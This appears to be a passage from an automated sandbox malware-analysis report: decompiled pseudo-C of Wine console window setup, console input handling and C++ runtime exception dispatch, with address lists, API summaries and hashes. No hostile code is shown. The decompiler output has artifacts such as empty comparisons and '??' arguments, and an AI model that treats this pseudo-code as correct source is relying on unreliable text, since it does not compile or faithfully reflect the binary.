				_v468.hInstance = GetModuleHandleW(0);
				_v468.hIcon = 0;
				_v468.hCursor = LoadCursorW(0, 0x7f00);
				_v468.hbrBackground = GetStockObject(4);
				_v468.lpszMenuName = 0;
				_v468.lpszClassName = L"WineConFontPreview";
				RegisterClassW( &_v468);
				_v468.style = 0;
				_v468.lpfnWndProc = E00B1BF30;
				_v468.cbClsExtra = 0;
				_v468.cbWndExtra = 4;
				_v468.hInstance = GetModuleHandleW(0);
				_v468.hIcon = 0;
				_v468.hCursor = LoadCursorW(0, 0x7f00);
				_v468.hbrBackground = GetStockObject(4);
				_v468.lpszMenuName = 0;
				_v468.lpszClassName = L"WineConColorPreview";
				RegisterClassW( &_v468);
				_t110 =  &_v980;
				_v1024 = _t110;
				0x710000();
				_t165 = _t156 - 0xffffffffffffffdc;
				_v984 = _t110;
				_v988 =  &_v980;
				_t113 =  !=  ? 0x121 : 0x120;
				_v992 =  !=  ? 0x121 : 0x120;
				 *_t165 = 0;
				_t115 = GetModuleHandleW(??);
				_t166 = _t165 - 4;
				 *_t166 = _t115;
				_v1024 = _v992;
				_v1020 = _v988;
				_v1016 = _v984;
				_t117 = LoadStringW(??, ??, ??, ??);
				_t167 = _t166 - 0x10;
				if(_t117 == 0) {
					 *_t167 =  &_v980;
					_v1024 = L"Setup";
					E00B211F7();
				}
				_t118 = _t167;
				 *((intOrPtr*)(_t118 + 4)) =  &_v428 + 4;
				 *_t118 =  &_v216;
				 *((intOrPtr*)(_t118 + 8)) = 0xcc;
				if(E00B1E02E() != 0) {
					if(_a8 != 0) {
						 *_t167 = _a4;
						_v1024 =  &_v428 + 4;
						E00B14AB0();
						_t169 = _t167 - 8;
						 *_t169 = _v428;
						E00B18E70();
						_t167 = _t169 - 4;
					}
					_v996 =  &_v428 + 4;
					if(_a8 == 0) {
						_v1000 = 0;
					} else {
						_v1000 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x84)) + 0x24));
					}
					 *_t167 = _v1000;
					_v1024 = _v996;
					E00B1C3B0();
					_v12 = 1;
				} else {
					_v12 = 1;
				}
				return _v12;
			}




























                                              0x00b1a680
                                              0x00b1a690
                                              0x00b1a6b0
                                              0x00b1a6b8
                                              0x00b1a6c2
                                              0x00b1a6f3
                                              0x00b1a6fa
                                              0x00b1a6fe
                                              0x00b1a703
                                              0x00b1a6c8
                                              0x00b1a6d4
                                              0x00b1a6d7
                                              0x00b1a6db
                                              0x00b1a6e0
                                              0x00b1a6e0
                                              0x00b1a724
                                              0x00b1a729
                                              0x00b1a739
                                              0x00b1a73f
                                              0x00b1a749
                                              0x00b1a765
                                              0x00b1a76b
                                              0x00b1a790
                                              0x00b1a7a6
                                              0x00b1a7ac
                                              0x00b1a7bc
                                              0x00b1a7cb
                                              0x00b1a7d4
                                              0x00b1a7e4
                                              0x00b1a7ea
                                              0x00b1a7f4
                                              0x00b1a810
                                              0x00b1a816
                                              0x00b1a83b
                                              0x00b1a851
                                              0x00b1a857
                                              0x00b1a867
                                              0x00b1a876
                                              0x00b1a87f
                                              0x00b1a885
                                              0x00b1a888
                                              0x00b1a88d
                                              0x00b1a890
                                              0x00b1a89c
                                              0x00b1a8b2
                                              0x00b1a8b5
                                              0x00b1a8bd
                                              0x00b1a8c4
                                              0x00b1a8ca
                                              0x00b1a8e1
                                              0x00b1a8e4
                                              0x00b1a8e8
                                              0x00b1a8ec
                                              0x00b1a8f0
                                              0x00b1a8f6
                                              0x00b1a8fc
                                              0x00b1a90e
                                              0x00b1a911
                                              0x00b1a915
                                              0x00b1a915
                                              0x00b1a929
                                              0x00b1a92b
                                              0x00b1a92e
                                              0x00b1a930
                                              0x00b1a93f
                                              0x00b1a955
                                              0x00b1a967
                                              0x00b1a96a
                                              0x00b1a96e
                                              0x00b1a973
                                              0x00b1a97c
                                              0x00b1a97f
                                              0x00b1a984
                                              0x00b1a984
                                              0x00b1a990
                                              0x00b1a99a
                                              0x00b1a9b9
                                              0x00b1a9a0
                                              0x00b1a9ac
                                              0x00b1a9ac
                                              0x00b1a9d0
                                              0x00b1a9d3
                                              0x00b1a9d7
                                              0x00b1a9df
                                              0x00b1a945
                                              0x00b1a945
                                              0x00b1a945
                                              0x00b1a9f1

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.393507190.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                              • Associated: 00000002.00000002.393394170.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393529256.0000000000B2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393542517.0000000000B34000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393551749.0000000000B39000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_b10000_febcldoukq.jbxd
                                              Similarity
                                              • API ID: HandleLoadModule$ClassCursorObjectRegisterStock$StringVisibleWindow
                                              • String ID: Setup$WineConColorPreview$WineConFontPreview
                                              • API String ID: 3977189380-2851978119
                                              • Opcode ID: 28ed17ff0909779931525e8a9e673ed3cad329e51043c9fd68de860650fe8319
                                              • Instruction ID: c9808c841bb7ef49dde0a0c2f489549f24053620fbd5274fe15add491717bd29
                                              • Opcode Fuzzy Hash: 28ed17ff0909779931525e8a9e673ed3cad329e51043c9fd68de860650fe8319
                                              • Instruction Fuzzy Hash: 6E91DAB19052189FDB50EF28D9497DDBBF4FB08344F4085AAE889E7250DB749A88CF42
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00B17B20 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 281COMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateEventW.KERNEL32 ref: 00B17BAE
                                              • EnterCriticalSection.KERNEL32 ref: 00B17C7A
                                              • MultiByteToWideChar.KERNEL32 ref: 00B17D09
                                              • LeaveCriticalSection.KERNEL32 ref: 00B17DBD
                                              • LeaveCriticalSection.KERNEL32 ref: 00B17F5A
                                              • EnterCriticalSection.KERNEL32 ref: 00B17F76
                                              • CloseHandle.KERNEL32 ref: 00B1800E
                                              • LeaveCriticalSection.KERNEL32 ref: 00B1802D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.393507190.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                              • Associated: 00000002.00000002.393394170.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393529256.0000000000B2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393542517.0000000000B34000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393551749.0000000000B39000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_b10000_febcldoukq.jbxd
                                              Similarity
                                              • API ID: CriticalSection$Leave$Enter$ByteCharCloseCreateEventHandleMultiWide
                                              • String ID: H$input restore failed: %#lx$input setup failed: %#lx
                                              • API String ID: 628538822-1542851097
                                              • Opcode ID: 0c8a7da7b359dabe54b514c437ab4783874223f9cdad445e6961efae02b17d75
                                              • Instruction ID: 31ed8491b646f597deee65d7a2f68581e6c8207f0c63b4ad452fbb44a98d3f10
                                              • Opcode Fuzzy Hash: 0c8a7da7b359dabe54b514c437ab4783874223f9cdad445e6961efae02b17d75
                                              • Instruction Fuzzy Hash: C4D119B5909215CFDB11EF68D5987AEBBF4FF48340F4088ADE48997240DB749A88CF52
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00B123E0 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 177COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.393507190.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                              • Associated: 00000002.00000002.393394170.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393529256.0000000000B2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393542517.0000000000B34000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393551749.0000000000B39000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_b10000_febcldoukq.jbxd
                                              Similarity
                                              • API ID: Info$CharsetStartupTranslate
                                              • String ID: WineConsoleClass
                                              • API String ID: 3822699805-3427835368
                                              • Opcode ID: fa0cfbda8df7855832444ef7de0b8ad11ec107a1126da6aa5867738556760ff3
                                              • Instruction ID: db011885c38444a2812b0c30a4c208df24535ece386a9ffe581155360e419f9c
                                              • Opcode Fuzzy Hash: fa0cfbda8df7855832444ef7de0b8ad11ec107a1126da6aa5867738556760ff3
                                              • Instruction Fuzzy Hash: CF91B8B49042198FDB20DF68D994BDDBBF0FF08304F5089A9E889AB351DB759A94CF41
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00B12E20 Relevance: 16.7, APIs: 11, Instructions: 228COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.393507190.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                              • Associated: 00000002.00000002.393394170.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393529256.0000000000B2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393542517.0000000000B34000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393551749.0000000000B39000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_b10000_febcldoukq.jbxd
                                              Similarity
                                              • API ID: Object$DeleteReleaseSelectText$CreateFaceFontIndirectInfoMetrics
                                              • String ID:
                                              • API String ID: 2170087643-0
                                              • Opcode ID: 36cebba9ea27c9bbeca15d20ac548f29d7f5c7d01338e7ad1a4db55bfb095a9a
                                              • Instruction ID: f0196736d788d209d4e6b4e817d4e3cd30459f8792cf04e2c6c0dcf70323507c
                                              • Opcode Fuzzy Hash: 36cebba9ea27c9bbeca15d20ac548f29d7f5c7d01338e7ad1a4db55bfb095a9a
                                              • Instruction Fuzzy Hash: 3CB17378A04218DFCB14DF68D588AADBBF1FF49314F5584A9E889DB351DB30E984CB41
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00B27A82 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                              Download Yara Rule
                                              C-Code - Quality: 64%
                                              			E00B27A82(signed int __edx, intOrPtr* _a4, signed int _a8, signed int _a12, intOrPtr _a16, signed int* _a20, signed int _a24, signed int _a28, signed int _a32, signed int _a36) {
				intOrPtr _v0;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr* _v44;
				intOrPtr _v48;
				signed int* _v52;
				intOrPtr _v56;
				signed int _v64;
				void* _v68;
				char _v84;
				signed int _v88;
				signed int _v92;
				intOrPtr _v100;
				void _v104;
				signed int _v108;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t146;
				signed int _t152;
				void* _t155;
				signed char _t160;
				signed int _t161;
				void* _t163;
				void* _t166;
				void* _t169;
				intOrPtr* _t179;
				void* _t182;
				intOrPtr* _t183;
				signed int _t184;
				signed int _t185;
				signed int _t187;
				void* _t191;
				void* _t196;
				void* _t197;
				intOrPtr _t201;
				intOrPtr* _t202;
				signed int _t203;
				signed int _t210;
				signed int _t211;
				intOrPtr _t214;
				signed int* _t218;
				signed int _t219;
				signed int _t224;
				signed int _t225;
				signed int _t231;
				void* _t234;
				void* _t235;

				_t216 = __edx;
				_t218 = _a20;
				_v20 = 0;
				_v28 = 0;
				_t204 = E00B28C58(_a8, _a16, _t218);
				_t235 = _t234 + 0xc;
				_v12 = _t204;
				if(_t204 < 0xffffffff || _t204 >= _t218[1]) {
					L67:
					E00B21BDC(_t202, _t204, _t216, _t218, _t225);
					asm("int3");
					__eflags = _v88;
					_push(_t202);
					_t203 = _v92;
					_push(_t225);
					_push(_t218);
					_t219 = _v108;
					if(__eflags != 0) {
						_push(_a24);
						_push(_t203);
						_push(_t219);
						_push(_v0);
						E00B279E9(_t203, _t219, _t225, __eflags);
						_t235 = _t235 + 0x10;
					}
					_t146 = _a36;
					__eflags = _t146;
					if(_t146 == 0) {
						_t146 = _t219;
					}
					E00B2425E(_t204, _t146, _v0);
					_t226 = _a28;
					_push( *_a28);
					_push(_a16);
					_push(_a12);
					_push(_t219);
					E00B27232(_t203, _t204, _t216, _t219, _a28, __eflags);
					E00B28C75(_t219, _a16,  *((intOrPtr*)(_t226 + 4)) + 1);
					_push(0x100);
					_push(_a32);
					_push( *((intOrPtr*)(_t203 + 0xc)));
					_push(_a16);
					_push(_a8);
					_push(_t219);
					_push(_v0);
					_t152 = E00B27429(_t203, _t216, _t219, _t226, __eflags);
					__eflags = _t152;
					if(_t152 != 0) {
						E00B2422E(_t152, _t219);
						return _t152;
					}
					return _t152;
				} else {
					_t202 = _a4;
					if( *_t202 != 0xe06d7363 ||  *((intOrPtr*)(_t202 + 0x10)) != 3 ||  *((intOrPtr*)(_t202 + 0x14)) != 0x19930520 &&  *((intOrPtr*)(_t202 + 0x14)) != 0x19930521 &&  *((intOrPtr*)(_t202 + 0x14)) != 0x19930522) {
						L22:
						_t216 = _a12;
						_v8 = _a12;
						goto L24;
					} else {
						_t225 = 0;
						if( *((intOrPtr*)(_t202 + 0x1c)) != 0) {
							goto L22;
						} else {
							_t155 = E00B21C6E(_t202, _t204, _t216, _t218, 0);
							if( *((intOrPtr*)(_t155 + 0x10)) == 0) {
								L61:
								return _t155;
							} else {
								_t202 =  *((intOrPtr*)(E00B21C6E(_t202, _t204, _t216, _t218, 0) + 0x10));
								_t191 = E00B21C6E(_t202, _t204, _t216, _t218, 0);
								_v28 = 1;
								_v8 =  *((intOrPtr*)(_t191 + 0x14));
								if(_t202 == 0 ||  *_t202 == 0xe06d7363 &&  *((intOrPtr*)(_t202 + 0x10)) == 3 && ( *((intOrPtr*)(_t202 + 0x14)) == 0x19930520 ||  *((intOrPtr*)(_t202 + 0x14)) == 0x19930521 ||  *((intOrPtr*)(_t202 + 0x14)) == 0x19930522) &&  *((intOrPtr*)(_t202 + 0x1c)) == _t225) {
									goto L67;
								} else {
									if( *((intOrPtr*)(E00B21C6E(_t202, _t204, _t216, _t218, _t225) + 0x1c)) == _t225) {
										L23:
										_t216 = _v8;
										_t204 = _v12;
										L24:
										_v52 = _t218;
										_v48 = 0;
										__eflags =  *_t202 - 0xe06d7363;
										if( *_t202 != 0xe06d7363) {
											L57:
											__eflags = _t218[3];
											if(_t218[3] <= 0) {
												goto L60;
											} else {
												__eflags = _a24;
												if(_a24 != 0) {
													goto L67;
												} else {
													E00B27EA7(_t204, _t216, _t218, _t225, _t202, _a8, _t216, _a16, _t218, _t204, _a28, _a32);
													_t235 = _t235 + 0x20;
													goto L60;
												}
											}
										} else {
											__eflags =  *((intOrPtr*)(_t202 + 0x10)) - 3;
											if( *((intOrPtr*)(_t202 + 0x10)) != 3) {
												goto L57;
											} else {
												__eflags =  *((intOrPtr*)(_t202 + 0x14)) - 0x19930520;
												if( *((intOrPtr*)(_t202 + 0x14)) == 0x19930520) {
													L29:
													_t225 = _a32;
													__eflags = _t218[3];
													if(_t218[3] > 0) {
														E00B241BE(_t204,  &_v68,  &_v52, _t204, _a16, _t218, _a28);
														_t216 = _v64;
														_t235 = _t235 + 0x18;
														_t179 = _v68;
														_v44 = _t179;
														_v16 = _t216;
														__eflags = _t216 - _v56;
														if(_t216 < _v56) {
															_t210 = _t216 * 0x14;
															__eflags = _t210;
															_v32 = _t210;
															do {
																_t211 = 5;
																_t182 = memcpy( &_v104,  *((intOrPtr*)( *_t179 + 0x10)) + _t210, _t211 << 2);
																_t235 = _t235 + 0xc;
																__eflags = _v104 - _t182;
																if(_v104 <= _t182) {
																	__eflags = _t182 - _v100;
																	if(_t182 <= _v100) {
																		_t214 = 0;
																		_v20 = 0;
																		__eflags = _v92;
																		if(_v92 != 0) {
																			_t217 =  *((intOrPtr*)(_t202 + 0x1c));
																			_t183 =  *((intOrPtr*)( *((intOrPtr*)(_t202 + 0x1c)) + 0xc));
																			_t184 = _t183 + 4;
																			__eflags = _t184;
																			_v36 = _t184;
																			_t185 = _v88;
																			_v40 =  *_t183;
																			_v24 = _t185;
																			do {
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				_t231 = _v40;
																				_t224 = _v36;
																				__eflags = _t231;
																				if(_t231 <= 0) {
																					goto L40;
																				} else {
																					while(1) {
																						_t187 = E00B2781D( &_v84,  *_t224, _t217);
																						_t235 = _t235 + 0xc;
																						__eflags = _t187;
																						if(_t187 != 0) {
																							break;
																						}
																						_t217 =  *((intOrPtr*)(_t202 + 0x1c));
																						_t231 = _t231 - 1;
																						_t224 = _t224 + 4;
																						__eflags = _t231;
																						if(_t231 > 0) {
																							continue;
																						} else {
																							_t214 = _v20;
																							_t185 = _v24;
																							goto L40;
																						}
																						goto L43;
																					}
																					_push(_a24);
																					_push(_v28);
																					_push(_a32);
																					_push(_a28);
																					_push( &_v104);
																					_push( *_t224);
																					_push( &_v84);
																					_push(_a20);
																					_push(_a16);
																					_push(_v8);
																					_push(_a8);
																					_push(_t202);
																					L68();
																					_t235 = _t235 + 0x30;
																				}
																				L43:
																				_t216 = _v16;
																				goto L44;
																				L40:
																				_t214 = _t214 + 1;
																				_t185 = _t185 + 0x10;
																				_v20 = _t214;
																				_v24 = _t185;
																				__eflags = _t214 - _v92;
																			} while (_t214 != _v92);
																			goto L43;
																		}
																	}
																}
																L44:
																_t216 = _t216 + 1;
																_t179 = _v44;
																_t210 = _v32 + 0x14;
																_v16 = _t216;
																_v32 = _t210;
																__eflags = _t216 - _v56;
															} while (_t216 < _v56);
															_t218 = _a20;
															_t225 = _a32;
														}
													}
													__eflags = _a24;
													if(__eflags != 0) {
														_push(1);
														E00B1DC55(_t202, _t218, _t225, __eflags);
														_t204 = _t202;
													}
													__eflags = ( *_t218 & 0x1fffffff) - 0x19930521;
													if(( *_t218 & 0x1fffffff) < 0x19930521) {
														L60:
														_t155 = E00B21C6E(_t202, _t204, _t216, _t218, _t225);
														__eflags =  *(_t155 + 0x1c);
														if( *(_t155 + 0x1c) != 0) {
															goto L67;
														} else {
															goto L61;
														}
													} else {
														_t160 = _t218[8] >> 2;
														__eflags = _t218[7];
														if(_t218[7] != 0) {
															__eflags = _t160 & 0x00000001;
															if((_t160 & 0x00000001) == 0) {
																_push(_t218[7]);
																_t161 = E00B27642();
																_t204 = _t202;
																__eflags = _t161;
																if(_t161 == 0) {
																	goto L64;
																} else {
																	goto L60;
																}
															} else {
																goto L54;
															}
														} else {
															__eflags = _t160 & 0x00000001;
															if((_t160 & 0x00000001) == 0) {
																goto L60;
															} else {
																__eflags = _a28;
																if(_a28 != 0) {
																	goto L60;
																} else {
																	L54:
																	 *((intOrPtr*)(E00B21C6E(_t202, _t204, _t216, _t218, _t225) + 0x10)) = _t202;
																	_t169 = E00B21C6E(_t202, _t204, _t216, _t218, _t225);
																	_t206 = _v8;
																	 *((intOrPtr*)(_t169 + 0x14)) = _v8;
																	goto L62;
																}
															}
														}
													}
												} else {
													__eflags =  *((intOrPtr*)(_t202 + 0x14)) - 0x19930521;
													if( *((intOrPtr*)(_t202 + 0x14)) == 0x19930521) {
														goto L29;
													} else {
														__eflags =  *((intOrPtr*)(_t202 + 0x14)) - 0x19930522;
														if( *((intOrPtr*)(_t202 + 0x14)) != 0x19930522) {
															goto L57;
														} else {
															goto L29;
														}
													}
												}
											}
										}
									} else {
										_v16 =  *((intOrPtr*)(E00B21C6E(_t202, _t204, _t216, _t218, _t225) + 0x1c));
										_t196 = E00B21C6E(_t202, _t204, _t216, _t218, _t225);
										_push(_v16);
										 *(_t196 + 0x1c) = _t225;
										_t197 = E00B27642();
										_t206 = _t202;
										if(_t197 != 0) {
											goto L23;
										} else {
											_t218 = _v16;
											_t255 =  *_t218 - _t225;
											if( *_t218 <= _t225) {
												L62:
												E00B2117B(_t202, _t206, _t216, _t218, _t225, __eflags);
											} else {
												while(1) {
													_t206 =  *((intOrPtr*)(_t225 + _t218[1] + 4));
													if(E00B2740A( *((intOrPtr*)(_t225 + _t218[1] + 4)), _t255, 0xb348c0) != 0) {
														goto L63;
													}
													_t225 = _t225 + 0x10;
													_t201 = _v20 + 1;
													_v20 = _t201;
													_t255 = _t201 -  *_t218;
													if(_t201 >=  *_t218) {
														goto L62;
													} else {
														continue;
													}
													goto L63;
												}
											}
											L63:
											_push(1);
											_push(_t202);
											E00B1DC55(_t202, _t218, _t225, __eflags);
											_t204 =  &_v64;
											E00B273C6( &_v64);
											E00B28D05( &_v64, 0xb3328c);
											L64:
											 *((intOrPtr*)(E00B21C6E(_t202, _t204, _t216, _t218, _t225) + 0x10)) = _t202;
											_t163 = E00B21C6E(_t202, _t204, _t216, _t218, _t225);
											_t204 = _v8;
											 *(_t163 + 0x14) = _v8;
											__eflags = _t225;
											if(_t225 == 0) {
												_t225 = _a8;
											}
											E00B2425E(_t204, _t225, _t202);
											L00B2731A(_a8, _a16, _t218);
											_t166 = E00B27332(_t218);
											_t235 = _t235 + 0x10;
											_push(_t166);
											E00B276DC(_t202, _t204, _t216, _t218, _t225, __eflags);
											goto L67;
										}
									}
								}
							}
						}
					}
				}
			}



























































                                              0x00b27a82
                                              0x00b27a8b
                                              0x00b27a94
                                              0x00b27a9a
                                              0x00b27aa2
                                              0x00b27aa4
                                              0x00b27aa7
                                              0x00b27aad
                                              0x00b27e21
                                              0x00b27e21
                                              0x00b27e26
                                              0x00b27e2a
                                              0x00b27e2e
                                              0x00b27e2f
                                              0x00b27e32
                                              0x00b27e33
                                              0x00b27e34
                                              0x00b27e37
                                              0x00b27e39
                                              0x00b27e3c
                                              0x00b27e3d
                                              0x00b27e3e
                                              0x00b27e41
                                              0x00b27e46
                                              0x00b27e46
                                              0x00b27e49
                                              0x00b27e4c
                                              0x00b27e4e
                                              0x00b27e50
                                              0x00b27e50
                                              0x00b27e56
                                              0x00b27e5b
                                              0x00b27e5e
                                              0x00b27e60
                                              0x00b27e63
                                              0x00b27e66
                                              0x00b27e67
                                              0x00b27e75
                                              0x00b27e7a
                                              0x00b27e7f
                                              0x00b27e82
                                              0x00b27e85
                                              0x00b27e88
                                              0x00b27e8b
                                              0x00b27e8c
                                              0x00b27e8f
                                              0x00b27e97
                                              0x00b27e99
                                              0x00b27e9d
                                              0x00000000
                                              0x00b27e9d
                                              0x00b27ea6
                                              0x00b27abc
                                              0x00b27abc
                                              0x00b27ac5
                                              0x00b27bc2
                                              0x00b27bc2
                                              0x00b27bc5
                                              0x00000000
                                              0x00b27af4
                                              0x00b27af4
                                              0x00b27af9
                                              0x00000000
                                              0x00b27aff
                                              0x00b27aff
                                              0x00b27b07
                                              0x00b27dbf
                                              0x00b27dbf
                                              0x00b27b0d
                                              0x00b27b12
                                              0x00b27b15
                                              0x00b27b1a
                                              0x00b27b21
                                              0x00b27b26
                                              0x00000000
                                              0x00b27b5e
                                              0x00b27b66
                                              0x00b27bca
                                              0x00b27bca
                                              0x00b27bcd
                                              0x00b27bd0
                                              0x00b27bd2
                                              0x00b27bd5
                                              0x00b27bd8
                                              0x00b27bde
                                              0x00b27d8a
                                              0x00b27d8a
                                              0x00b27d8d
                                              0x00000000
                                              0x00b27d8f
                                              0x00b27d8f
                                              0x00b27d92
                                              0x00000000
                                              0x00b27d98
                                              0x00b27da8
                                              0x00b27dad
                                              0x00000000
                                              0x00b27dad
                                              0x00b27d92
                                              0x00b27be4
                                              0x00b27be4
                                              0x00b27be8
                                              0x00000000
                                              0x00b27bee
                                              0x00b27bee
                                              0x00b27bf5
                                              0x00b27c0d
                                              0x00b27c0d
                                              0x00b27c10
                                              0x00b27c13
                                              0x00b27c29
                                              0x00b27c2e
                                              0x00b27c31
                                              0x00b27c34
                                              0x00b27c37
                                              0x00b27c3a
                                              0x00b27c3d
                                              0x00b27c40
                                              0x00b27c46
                                              0x00b27c46
                                              0x00b27c49
                                              0x00b27c4c
                                              0x00b27c5b
                                              0x00b27c5c
                                              0x00b27c5c
                                              0x00b27c5e
                                              0x00b27c61
                                              0x00b27c67
                                              0x00b27c6a
                                              0x00b27c70
                                              0x00b27c72
                                              0x00b27c75
                                              0x00b27c78
                                              0x00b27c7e
                                              0x00b27c81
                                              0x00b27c86
                                              0x00b27c86
                                              0x00b27c89
                                              0x00b27c8c
                                              0x00b27c8f
                                              0x00b27c92
                                              0x00b27c95
                                              0x00b27c9a
                                              0x00b27c9b
                                              0x00b27c9c
                                              0x00b27c9d
                                              0x00b27c9e
                                              0x00b27ca1
                                              0x00b27ca4
                                              0x00b27ca6
                                              0x00000000
                                              0x00b27ca8
                                              0x00b27ca8
                                              0x00b27caf
                                              0x00b27cb4
                                              0x00b27cb7
                                              0x00b27cb9
                                              0x00000000
                                              0x00000000
                                              0x00b27cbb
                                              0x00b27cbe
                                              0x00b27cbf
                                              0x00b27cc2
                                              0x00b27cc4
                                              0x00000000
                                              0x00b27cc6
                                              0x00b27cc6
                                              0x00b27cc9
                                              0x00000000
                                              0x00b27cc9
                                              0x00000000
                                              0x00b27cc4
                                              0x00b27cdd
                                              0x00b27ce3
                                              0x00b27ce6
                                              0x00b27ce9
                                              0x00b27cec
                                              0x00b27ced
                                              0x00b27cf2
                                              0x00b27cf3
                                              0x00b27cf6
                                              0x00b27cf9
                                              0x00b27cfc
                                              0x00b27cff
                                              0x00b27d00
                                              0x00b27d05
                                              0x00b27d05
                                              0x00b27d08
                                              0x00b27d08
                                              0x00000000
                                              0x00b27ccc
                                              0x00b27ccc
                                              0x00b27ccd
                                              0x00b27cd0
                                              0x00b27cd3
                                              0x00b27cd6
                                              0x00b27cd6
                                              0x00000000
                                              0x00b27cdb
                                              0x00b27c78
                                              0x00b27c6a
                                              0x00b27d0b
                                              0x00b27d0e
                                              0x00b27d0f
                                              0x00b27d12
                                              0x00b27d15
                                              0x00b27d18
                                              0x00b27d1b
                                              0x00b27d1b
                                              0x00b27d24
                                              0x00b27d27
                                              0x00b27d27
                                              0x00b27c40
                                              0x00b27d2a
                                              0x00b27d2e
                                              0x00b27d30
                                              0x00b27d33
                                              0x00b27d39
                                              0x00b27d39
                                              0x00b27d41
                                              0x00b27d46
                                              0x00b27db0
                                              0x00b27db0
                                              0x00b27db5
                                              0x00b27db9
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00b27d48
                                              0x00b27d4b
                                              0x00b27d4e
                                              0x00b27d52
                                              0x00b27d60
                                              0x00b27d62
                                              0x00b27d79
                                              0x00b27d7d
                                              0x00b27d83
                                              0x00b27d84
                                              0x00b27d86
                                              0x00000000
                                              0x00b27d88
                                              0x00000000
                                              0x00b27d88
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00b27d54
                                              0x00b27d54
                                              0x00b27d56
                                              0x00000000
                                              0x00b27d58
                                              0x00b27d58
                                              0x00b27d5c
                                              0x00000000
                                              0x00b27d5e
                                              0x00b27d64
                                              0x00b27d69
                                              0x00b27d6c
                                              0x00b27d71
                                              0x00b27d74
                                              0x00000000
                                              0x00b27d74
                                              0x00b27d5c
                                              0x00b27d56
                                              0x00b27d52
                                              0x00b27bf7
                                              0x00b27bf7
                                              0x00b27bfe
                                              0x00000000
                                              0x00b27c00
                                              0x00b27c00
                                              0x00b27c07
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00b27c07
                                              0x00b27bfe
                                              0x00b27bf5
                                              0x00b27be8
                                              0x00b27b68
                                              0x00b27b70
                                              0x00b27b73
                                              0x00b27b78
                                              0x00b27b7c
                                              0x00b27b7f
                                              0x00b27b85
                                              0x00b27b88
                                              0x00000000
                                              0x00b27b8a
                                              0x00b27b8a
                                              0x00b27b8d
                                              0x00b27b8f
                                              0x00b27dc0
                                              0x00b27dc0
                                              0x00000000
                                              0x00b27b95
                                              0x00b27b9d
                                              0x00b27ba8
                                              0x00000000
                                              0x00000000
                                              0x00b27bb1
                                              0x00b27bb4
                                              0x00b27bb5
                                              0x00b27bb8
                                              0x00b27bba
                                              0x00000000
                                              0x00b27bc0
                                              0x00000000
                                              0x00b27bc0
                                              0x00000000
                                              0x00b27bba
                                              0x00b27b95
                                              0x00b27dc5
                                              0x00b27dc5
                                              0x00b27dc7
                                              0x00b27dc8
                                              0x00b27dcf
                                              0x00b27dd2
                                              0x00b27de0
                                              0x00b27de5
                                              0x00b27dea
                                              0x00b27ded
                                              0x00b27df2
                                              0x00b27df5
                                              0x00b27df8
                                              0x00b27dfa
                                              0x00b27dfc
                                              0x00b27dfc
                                              0x00b27e01
                                              0x00b27e0d
                                              0x00b27e13
                                              0x00b27e18
                                              0x00b27e1b
                                              0x00b27e1c
                                              0x00000000
                                              0x00b27e1c
                                              0x00b27b88
                                              0x00b27b66
                                              0x00b27b26
                                              0x00b27b07
                                              0x00b27af9
                                              0x00b27ac5

                                              APIs
                                              • type_info::operator==.LIBVCRUNTIME ref: 00B27BA1
                                              • ___TypeMatch.LIBVCRUNTIME ref: 00B27CAF
